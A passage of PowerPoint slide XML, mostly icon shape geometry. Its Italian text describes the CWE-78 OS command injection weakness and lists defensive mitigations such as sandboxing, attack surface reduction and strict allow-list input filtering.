                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7437" y="1"/>
                    <a:pt x="9592" y="2155"/>
                    <a:pt x="9592" y="4806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9592" y="7769"/>
                    <a:pt x="7147" y="8494"/>
                    <a:pt x="6940" y="10544"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2632" y="10544"/>
                  </a:move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014;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D732170-DBBC-D711-065E-57A98641F3EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1688884" y="1529012"/>
              <a:ext cx="92977" cy="86700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4310" h="4019" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4309" y="1844"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4309" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1865"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3045"/>
                    <a:pt x="974" y="4019"/>
                    <a:pt x="2155" y="4019"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3356" y="4019"/>
                    <a:pt x="4309" y="3045"/>
                    <a:pt x="4309" y="1865"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4309" y="1844"/>
                  </a:move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015;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85102140-0F28-777B-EE7C-8014D236427F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1508720" y="1289526"/>
              <a:ext cx="469655" cy="427653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21771" h="19824" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21625" y="16633"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21543" y="16551"/>
                    <a:pt x="21439" y="16509"/>
                    <a:pt x="21335" y="16509"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20134" y="16509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20134" y="7064"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20134" y="5945"/>
                    <a:pt x="19223" y="5034"/>
                    <a:pt x="18104" y="5034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16095" y="5034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16074" y="2879"/>
                    <a:pt x="14728" y="953"/>
                    <a:pt x="12718" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12159" y="0"/>
                    <a:pt x="11869" y="808"/>
                    <a:pt x="12408" y="1015"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14106" y="1657"/>
                    <a:pt x="15246" y="3294"/>
                    <a:pt x="15246" y="5116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15246" y="6629"/>
                    <a:pt x="14541" y="7519"/>
                    <a:pt x="13858" y="8369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13361" y="8969"/>
                    <a:pt x="12863" y="9611"/>
                    <a:pt x="12677" y="10440"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12263" y="10440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12718" y="4226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12739" y="4102"/>
                    <a:pt x="12698" y="3977"/>
                    <a:pt x="12615" y="3894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12532" y="3812"/>
                    <a:pt x="12428" y="3770"/>
                    <a:pt x="12304" y="3770"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9446" y="3770"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9342" y="3770"/>
                    <a:pt x="9218" y="3812"/>
                    <a:pt x="9135" y="3894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9073" y="3977"/>
                    <a:pt x="9031" y="4102"/>
                    <a:pt x="9031" y="4226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9487" y="10440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9093" y="10440"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8907" y="9611"/>
                    <a:pt x="8389" y="8969"/>
                    <a:pt x="7892" y="8369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7208" y="7499"/>
                    <a:pt x="6504" y="6629"/>
                    <a:pt x="6504" y="5096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6504" y="3273"/>
                    <a:pt x="7643" y="1657"/>
                    <a:pt x="9342" y="1015"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9881" y="829"/>
                    <a:pt x="9591" y="21"/>
                    <a:pt x="9052" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7043" y="953"/>
                    <a:pt x="5676" y="2879"/>
                    <a:pt x="5655" y="5034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3666" y="5034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2527" y="5034"/>
                    <a:pt x="1616" y="5945"/>
                    <a:pt x="1616" y="7064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1616" y="16509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435" y="16509"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="16509"/>
                    <a:pt x="0" y="16696"/>
                    <a:pt x="0" y="16944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18539"/>
                    <a:pt x="1284" y="19823"/>
                    <a:pt x="2900" y="19823"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18870" y="19823"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20465" y="19823"/>
                    <a:pt x="21770" y="18539"/>
                    <a:pt x="21770" y="16944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21770" y="16820"/>
                    <a:pt x="21729" y="16716"/>
                    <a:pt x="21646" y="16633"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9963" y="11269"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12615" y="11269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12615" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9156" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9156" y="11269"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12553" y="13133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12118" y="14893"/>
                    <a:pt x="9632" y="14893"/>
                    <a:pt x="9197" y="13133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9922" y="4599"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11848" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11413" y="10419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10357" y="10419"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2465" y="7064"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2465" y="6421"/>
                    <a:pt x="3004" y="5883"/>
                    <a:pt x="3666" y="5883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5717" y="5883"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5924" y="7229"/>
                    <a:pt x="6608" y="8099"/>
                    <a:pt x="7229" y="8886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7747" y="9529"/>
                    <a:pt x="8223" y="10109"/>
                    <a:pt x="8306" y="10875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8306" y="12698"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8203" y="14210"/>
                    <a:pt x="9383" y="15473"/>
                    <a:pt x="10896" y="15473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12387" y="15473"/>
                    <a:pt x="13568" y="14210"/>
                    <a:pt x="13464" y="12698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13464" y="10875"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13547" y="10109"/>
                    <a:pt x="14003" y="9549"/>
                    <a:pt x="14541" y="8886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15163" y="8099"/>
                    <a:pt x="15846" y="7229"/>
                    <a:pt x="16053" y="5883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18104" y="5883"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18746" y="5883"/>
                    <a:pt x="19285" y="6421"/>
                    <a:pt x="19285" y="7064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19285" y="16509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465" y="16509"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18870" y="18995"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2900" y="18995"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1926" y="18974"/>
                    <a:pt x="1098" y="18311"/>
                    <a:pt x="891" y="17379"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20859" y="17379"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20652" y="18311"/>
                    <a:pt x="19823" y="18974"/>
                    <a:pt x="18870" y="18995"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18870" y="18995"/>
                  </a:move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016;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C3EBB7-A99B-9BD9-3196-3F804DD74D18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1726421" y="1289039"/>
              <a:ext cx="21465" cy="21486"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="995" h="996" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="415" y="995"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="995"/>
                    <a:pt x="995" y="539"/>
                    <a:pt x="726" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="1"/>
                    <a:pt x="1" y="187"/>
                    <a:pt x="1" y="581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="809"/>
                    <a:pt x="187" y="995"/>
                    <a:pt x="415" y="995"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="415" y="995"/>
                  </a:move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9" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725201" y="485090"/>
            <a:ext cx="77040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it-IT" sz="3200"/>
              <a:t>CWE-78 NEUTRALIZZAZIONE IMPROPRIA DI ELEMENTI…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7687365" y="877299"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="184427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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Consenti agli attaccanti di eseguire comandi imprevisti direttamente sul Sistema Operativo. Il problema nasce quando questa debolezza si verifica in un programma privilegiato permettendo all’attaccante di specificare comandi che normalmente non sarebbero accessibili</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>Potenziali mitigazioni:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;4976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19479576-38D5-97FD-7333-158F68565EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819821" y="2736273"/>
            <a:ext cx="3752179" cy="184427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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Strategy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Sandbox or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1"/>
              <a:t>Jail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>eseguire il codice in una «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>jail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>» o in un ambiente sandbox che impone limiti rigorosi tra il processo ed il Sistema Operativo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Attack Surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1"/>
              <a:t>Reduction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Mantenere quanti più dati possibili fuori dal controllo dell’attaccante. Ad es., nelle applicazioni Web, è meglio archiviare i dati nello stato della sessione.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;4976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFED1EC-E8DD-6AEF-DB4E-79E37B55359A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4666620" y="2736273"/>
            <a:ext cx="3752179" cy="184427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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Output Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>evitare o filtrare tutti i caratteri che non passano una lista consentita di caratteri estremamente rigida (uso di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Evitare di prendere in input parametri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>dalla riga di comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>, ma è meglio prenderli all’interno di un file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Google Shape;6337;p113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7925739-C3C7-766F-DE92-E2DB0ADEDC98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8034071" y="2736273"/>
            <a:ext cx="470108" cy="416719"/>
            <a:chOff x="1498733" y="2704451"/>
            <a:chExt cx="470108" cy="416719"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;6338;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6647643-6B1D-6CB5-BA08-1BA2C86AD872}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510588" y="2715844"/>
              <a:ext cx="451793" cy="303892"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="20943" h="14087" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1782" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19161" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20135" y="1"/>
                    <a:pt x="20943" y="808"/>
                    <a:pt x="20943" y="1803"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20943" y="12305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20943" y="13299"/>
                    <a:pt x="20135" y="14086"/>
                    <a:pt x="19161" y="14086"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1782" y="14086"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="14086"/>
                    <a:pt x="1" y="13299"/>
                    <a:pt x="1" y="12305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1782"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="808"/>
                    <a:pt x="788" y="1"/>
                    <a:pt x="1782" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1782" y="1"/>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339;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B478EB7B-0DE6-A19C-B1F1-1373A4C67120}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510588" y="2962504"/>
              <a:ext cx="451793" cy="57232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="20943" h="2653" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="20943" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="871"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1865"/>
                    <a:pt x="788" y="2652"/>
                    <a:pt x="1782" y="2652"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19161" y="2652"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20135" y="2652"/>
                    <a:pt x="20943" y="1865"/>
                    <a:pt x="20943" y="871"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20943" y="1"/>
                  </a:move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340;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34F8559-21A2-ABF6-D768-93F9E3FF3075}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1654023" y="3019715"/>
              <a:ext cx="164922" cy="88943"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7645" h="4123" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="6174" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1472" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1472" y="2154"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1451" y="3066"/>
                    <a:pt x="871" y="3853"/>
                    <a:pt x="1" y="4122"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7644" y="4122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6774" y="3853"/>
                    <a:pt x="6174" y="3066"/>
                    <a:pt x="6174" y="2154"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6174" y="0"/>
                  </a:move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341;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA68DC76-04CD-03A9-CC82-448C4BF14342}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1645998" y="2748462"/>
              <a:ext cx="180540" cy="180993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8369" h="8390" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="6131" y="1099"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6566" y="643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7726" y="1803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7271" y="2259"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7478" y="2590"/>
                    <a:pt x="7644" y="2963"/>
                    <a:pt x="7726" y="3356"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8369" y="3356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8369" y="4993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7747" y="4993"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7644" y="5407"/>
                    <a:pt x="7499" y="5780"/>
                    <a:pt x="7271" y="6132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7726" y="6588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6566" y="7727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6111" y="7292"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5779" y="7499"/>
                    <a:pt x="5386" y="7665"/>
                    <a:pt x="4992" y="7748"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4992" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3376" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3376" y="7727"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2983" y="7644"/>
                    <a:pt x="2589" y="7499"/>
                    <a:pt x="2258" y="7271"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1802" y="7727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="6567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098" y="6132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870" y="5780"/>
                    <a:pt x="725" y="5407"/>
                    <a:pt x="642" y="5014"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="3377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="2984"/>
                    <a:pt x="870" y="2590"/>
                    <a:pt x="1098" y="2259"/>
                  </a:cubicBezTo>
